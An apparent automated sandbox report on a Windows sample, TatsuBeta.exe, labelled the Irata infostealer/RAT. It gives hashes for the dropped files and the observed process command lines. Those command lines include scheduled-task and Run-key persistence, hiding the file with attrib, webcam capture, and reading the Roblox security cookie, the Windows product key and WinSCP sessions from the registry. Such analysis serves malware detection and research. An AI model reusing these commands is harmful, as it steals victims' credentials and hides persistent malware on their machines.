C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 094c6f324d66cb5c0173451b5e70953a
SHA1 59f4bd56acb2383e0e502505f0a9bdbe42c809c3
SHA256 c4f0b3c14bd9cabc07168b3b794ec746057b9c303b239f09b72f8c9f73e4a52f
SHA512 b703f3c5430fae9bb709fee5e80c81c34c6309eae6f94d30e0a0f93da22fbe23c1664cf5a06a2f50d7fc5226ab233ea3087bcf8adcd8a96c0858cb49d116ab63

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 d408124a6d49e171a9a96c0777749c32
SHA1 63f6d5606e1274e5bfaaeae132b6f0f869bb2a69
SHA256 b2d4bcf8176ab8b5151848b553017c14c9461e9551ca20a658189dda4d5c6b06
SHA512 53fc7da6113f5d97fcba338aab0a911658b3c73e1c8ae4a5b07249336106e16809e79292cd329b83ee378f7e556cef1248712685dbf94812875fa1eedc937ee1

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 3d1226489e4851ea7b85d3e3c1cf3bab
SHA1 8ae060684c52773b217064fecbae94546d919947
SHA256 ef72f90b116e119e93032fae1c3b855ec79c864d4e30e3ce0e797de591a576fe
SHA512 015b10dd8b05c4cdc64952743354f06fcd1ec2cfe9612186a99b312375078b7663fac0c7c994099d41df2f8a5d9e8c1e239aebd4d247f384cca827d1967a72b2

memory/4492-596-0x0000016227D80000-0x0000016227E2D000-memory.dmp

memory/2464-605-0x000002286B9C0000-0x000002286B9E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40t31y1b.amu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2464-615-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/2464-617-0x000002286B260000-0x000002286B270000-memory.dmp

memory/2464-619-0x000002286B260000-0x000002286B270000-memory.dmp

memory/2464-624-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/4112-627-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/4112-629-0x000001FB30380000-0x000001FB30390000-memory.dmp

memory/4112-628-0x000001FB30380000-0x000001FB30390000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ca1082427d7b2cd417d7c0b7fd95e4e
SHA1 b0482ff5b58ffff4f5242d77330b064190f269d3
SHA256 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512 bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

memory/4112-642-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/1384-648-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/1384-649-0x000002057D180000-0x000002057D190000-memory.dmp

memory/1384-650-0x000002057D180000-0x000002057D190000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

MD5 d93203f3264b3efc9d20e154455d46b1
SHA1 470bf3e88a4391b1cde6f12b43b3cafa360d8d18
SHA256 0c1a3751867940c1c8d4bbc870f29d3c28a86313ad56aae43d058e7e8f865cc8
SHA512 28344730dfc2c7da8802a1839c76f3842cc060eb95583bcc75c84735226a33ad58de2178f0d43493ae7a3095c56516b8830ba6f54316f6815b2be9ef5a54187e

memory/1384-664-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/6148-666-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/6148-668-0x0000020458470000-0x0000020458480000-memory.dmp

memory/6148-667-0x0000020458470000-0x0000020458480000-memory.dmp

memory/6148-679-0x0000020458470000-0x0000020458480000-memory.dmp

memory/6148-681-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/7476-684-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/7476-685-0x000001D8F9E70000-0x000001D8F9E80000-memory.dmp

memory/7476-686-0x000001D8F9E70000-0x000001D8F9E80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5ea61f668ad9fe64ff27dec34fe6d2f
SHA1 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b
SHA256 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466
SHA512 cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

memory/7476-697-0x000001D8F9E70000-0x000001D8F9E80000-memory.dmp

memory/7476-699-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp

MD5 c8c0b757369aa7f76e8fcae360bd20a0
SHA1 19fd217a468db0bfc67c54b3b178610e1914bcdf
SHA256 ce8981afecb84ec22a296d9feb90b2e0f3d92bd4903cb8d137654580e986900c
SHA512 0e098a29f5b6d7d8189507b592635502ad18893c51bf904517b6e0b9e032e54bc4c2d281adf52ea469ff2a1e1b9ac57b157e0fd3666847fa38fce654ac6ffe14

memory/8016-748-0x000001C7392B0000-0x000001C7392C0000-memory.dmp

memory/8016-747-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0e32728cf95b1a74034d53b9a489b7e
SHA1 cc7b495eda960574920990135a77c70c8ffd7242
SHA256 2aac55cbe6f40ab21f884502582143b285ecadc4df428ca0501afa35c9cd08ef
SHA512 34c01cde06dd08b5b5155656e083a9456c2a19980ca6302720fa9bc8f5d01b2dabf8aff72147bb818e4396fdd4fa79ff0f7db662ae793143a3f6986ca63354e4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mub5Xr.vbs

MD5 8c940430407dc8caae998a81cbaf8ca7
SHA1 abc6855bc5d7ebd87030eeb54894fdcbd64ed345
SHA256 32725b358f76ad08b2e604c3b63a25aa02711ae2c56136ea54d3ffb3816b41b3
SHA512 72739a1b132ff91c63b7bcb26992951e84d16d60828c3a9e8a0839990ab7e0bf76fd1f3cc8644cec3c478100d2d7c2dbd4c80b4eb447af4d5febc643896279c4

memory/8016-761-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/7584-796-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

memory/7584-798-0x000002115F940000-0x000002115F950000-memory.dmp

memory/7584-797-0x000002115F940000-0x000002115F950000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 45ffcfba7d8f8f9fbd078b4ea73f507e
SHA1 6a95dc5d432823e19b27b4a76db8caa94fb5fffb
SHA256 5b805f11d78f00564cc1455d916aec254714be8633406916d8d12c6e6b0abb7d
SHA512 ce09e12332d47012647471b190a5d008f21b90fd5f4c03de324eed51b55bc864f28ee347c9e6fc238e2eb52c5c58a194f2c8a6c0b3f3459f17de0f5fe92102bb

memory/7584-809-0x000002115F940000-0x000002115F950000-memory.dmp

C:\Users\Admin\AppData\Roaming\salutwVCt1.ps1

MD5 28e4eda7451c625bbe806b745753f729
SHA1 d29e9b2c2ac5b10188cbae92cffba6827728543d
SHA256 da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba
SHA512 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

memory/7584-813-0x00007FFAFADD0000-0x00007FFAFB891000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

MD5 2b67e47cb8da1058770fe41d8b947619
SHA1 9eb259b1d377a24a2b77a694cf31c23cef7b8eef
SHA256 46f616820751849512d2704ddb604666170d13315c4383b8c8611c3e1c2f594a
SHA512 27c0593d662df228e146c49af6da52e39523523af924cf95ba4890b1b42358b2b8df3cf2667d8f672eece4f7fe098574c4689677768dd54d3b872619c7b9ae55

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png

MD5 c555604e8b6f818991e186342f856b1b
SHA1 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0
SHA256 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972
SHA512 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

MD5 192e90432fed0081abb25295d8f309c4
SHA1 5150e93061f39e26688afd60a04c0ab14b510d47
SHA256 3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2
SHA512 9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

MD5 2f0a6a34d9b95bba0e3358ddd41ff2ac
SHA1 f39a9e7aeab9fe86fd9034284516de40186e6e93
SHA256 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5
SHA512 a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

Analysis: behavioral4

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win11-20231215-en

Max time kernel

11s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1560 --field-trial-handle=1688,5657953363304061064,15558905826196672242,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1896 --field-trial-handle=1688,5657953363304061064,15558905826196672242,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3388 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=3388 get ExecutablePath

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=3388 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3388 get ExecutablePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupmz5vxz /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupmz5vxz /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupmz5vxz /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupmz5vxz /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupmz5vxz /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\StJVqx1Lg29AqxRkcq7z\System\cam.1764_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

